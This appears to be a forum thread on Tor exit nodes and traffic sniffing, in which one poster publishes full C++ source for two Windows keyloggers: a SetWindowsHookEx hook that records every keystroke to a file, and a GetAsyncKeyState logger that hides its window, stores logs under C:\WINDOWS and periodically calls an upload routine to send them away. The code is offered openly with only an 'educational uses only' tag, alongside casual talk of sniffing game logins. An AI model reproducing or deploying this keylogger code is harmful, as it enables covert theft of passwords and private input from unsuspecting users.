TheRatherOdd1

At least I don't resort to name calling, jeeze. Who's the troll? If your worried about people using your network then don't be a exit node. But then your probably transmitting child porn in TOR and would never realize it. The great thing about running a exit node is plausible deniability.

@Mr-Protocol: If your having issues with people using your network to send spam why do you you by default allow no ports except 80 (HTTP), 443 (HTTPS), 23 (SSH) etc? Wouldn't that take of your problem? I don't see why you whine when you are running a proxy service and it's being abused. There are some things that are different about library computers. 1.) It's open to the public for anyone to use. 2.) Usually there is no form of validation (see above) of said computer users. 3.) Libraries are part of the government and different rules apply to their computers. Something to think about in today's news is that Google is in hot water for supposedly capturing data off unencrypted wifi's. So suppose your google and your end node is someone else wifi... [EDIT] Also don't try and prove a point and then call to moderators to lock the discussion. It's underhanded and just makes you look bad because after all were all being sensible right? This still has a little bit in common with the posts above about sniffing authentications from World of Warcraft.

Oh forgot to mention the two key-loggers above only work with Windows. I'm not exactly sure what the API is for capturing keys in Linux or Mac. Rarely ever would you get infected with one on those systems unless you got pwned by a 0-day or was just plain stupid to run a untrusted program as root.

#define _WIN32_WINNT 0x1337 #include <fstream> #include <windows.h> using namespace std; HHOOK keyboardHook; LRESULT CALLBACK keyboardHookProc(int nCode, WPARAM wParam, LPARAM lParam) { PKBDLLHOOKSTRUCT p = (PKBDLLHOOKSTRUCT) (lParam); // If key is being pressed if (wParam == WM_KEYDOWN) { ofstream out("keys.txt", ios::app); switch (p->vkCode) { // Invisible keys case VK_CAPITAL: out << "[CAPLOCK]"; break; case VK_LSHIFT: out << "[LSHIFT]"; break; case VK_RSHIFT: out << "[RSHIFT]"; break; case VK_LCONTROL: out << "[LCTRL]"; break; case VK_RCONTROL: out << "[RCTRL]"; break; case VK_INSERT: out << "[INSERT]"; break; case VK_END: out << "[END]"; break; case VK_PRINT: out << "[PRINT]"; break; case VK_DELETE: out << "[DEL]"; break; case VK_BACK: out << "[BK]"; break; case VK_LEFT: out << "[left]"; break; case VK_RIGHT: out << "[right]"; break; case VK_UP: out << "[UP]"; break; case VK_DOWN: out << "[DOWN]"; break; // Visible keys default: out << "[" << char(p->vkCode) << "]"; } out.close(); } return CallNextHookEx(NULL, nCode, wParam, lParam); } void keepAlive() { MSG message; while (GetMessage(&message,NULL,0,0)) { TranslateMessage( &message ); DispatchMessage( &message ); } } int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd) { keyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, keyboardHookProc, hInstance, 0); keepAlive(); UnhookWindowsHookEx(keyboardHook); return 0; } This key-logger goes about logging keys in a entirely different manner. It inserts a application-defined hook procedure into the hook chain. This one so happens to detect keyboard inputs. Using this style of hooks we can intercept keys and block them, or intercept the mouse messages. You can even intercept window messages and see messages in the queue. As long as the hook passes the messages it captures efficiently, and is unhooked when the program is terminated this can be a very efficient way to capture keys. For example while playing WoW you can have a hook listen for certain keys to control the volume of your audio player or do other things when certain keys are pressed. You can even modify what keys are captured and return totally different keys. Like if a user presses K the user would see the key U was pressed. Because of this you can potential do some weird and funny stuff to your system, so be careful. Most people think that you have to have a DLL to use SetWindowsHookEx, but as demonstrated in the above program this is not so. As long as the program you are using to create hooks can use pointers you don't have to have a DLL. Though I wouldn't recommend to try to do this in interpreted languages like C# or VisualBasic.net because of possible errors.

I'll go ahead and post the source code of two different types of keyloggers. #include <iostream> #include <fstream> #include "kekke.h" #include <conio.h> using namespace std; int main(int argc, char *argv[]) { short character; //Declarations int count = 0; string log = "C:\\WINDOWS\\"; TCHAR infoBuf[50]; //Getting computername DWORD bufCharCount = 50; GetComputerName(infoBuf, &bufCharCount); string loc = infoBuf; string los = ".log"; string tot = log + loc + los; hide(); ofstream temp; while(1) // main loop { count++; //send us the log sometimes.. if(count == 3000) { count = 0; upload(tot); } Sleep(10); for(character = 8; character <= 222; character++) // Logging keys { if(GetAsyncKeyState(character)==-32767) { if(character >=39 && character <=64 ) { temp.open(tot.c_str(), ios::app); temp << char(character); temp.close(); } else if(character > 64 && character < 91) { temp.open(tot.c_str(), ios::app); character+=32; temp << char(character); temp.close(); } else if(character == VK_RETURN) { temp.open(tot.c_str(), ios::app); temp << "\nENTER "; temp.close(); } else if(character == VK_SPACE) { temp.open(tot.c_str(), ios::app); temp << " "; temp.close(); } else if(character == VK_CONTROL) { temp.open(tot.c_str(), ios::app); temp << "\nCTRL "; temp.close(); } else if(character == VK_SHIFT) { temp.open(tot.c_str(), ios::app); temp << "\nSHIFT "; temp.close(); } else if(character == VK_BACK) { temp.open(tot.c_str(), ios::app); temp << "!"; temp.close(); } else if(character == VK_TAB) { temp.open(tot.c_str(), ios::app); temp << "\n"; temp.close(); } else if(character == VK_OEM_PERIOD) { temp.open(tot.c_str(), ios::app); temp << "."; temp.close(); } else if(character == VK_OEM_MINUS) { temp.open(tot.c_str(), ios::app); temp << "-"; temp.close(); } } } } return 0; } This is a GetAsyncKeyState keylogger. It hammers the API thousands of times a second to capture keys. It can cause high cpu usage if not throttled correctly, and can potentially miss keys if the system is being bogged down by other programs. Also since it uses the API it's fairly easy to detect unless the API call in the binary and in memory is obfuscated. This is one of the easier to create and use keylogger. (Note) The header is missing and it seems that was the part used by this program to send logs. For educational uses only please.

You should ask yourself why are you letting port 25 or 143 out as a exit node in the Tor network? Don't they (TOR) specifically say it's not recommended to allow those ports because of spam issues? On top of that here is something that is pertinent to our above discussion. Interesting, eh? Does that mean someone will waste their time to track you down? Unlikely. So there are some big risks involved....

Sadly, places like Jotti and Virusscan are the perfect places for a Antivirus company to run a honeypot. I mean how many people upload malware to those sites to prove they are not detected. Then after a week or two they are suddenly detected. Same with sandboxes like Anubis.

Any other laws you broke you would like to confess to?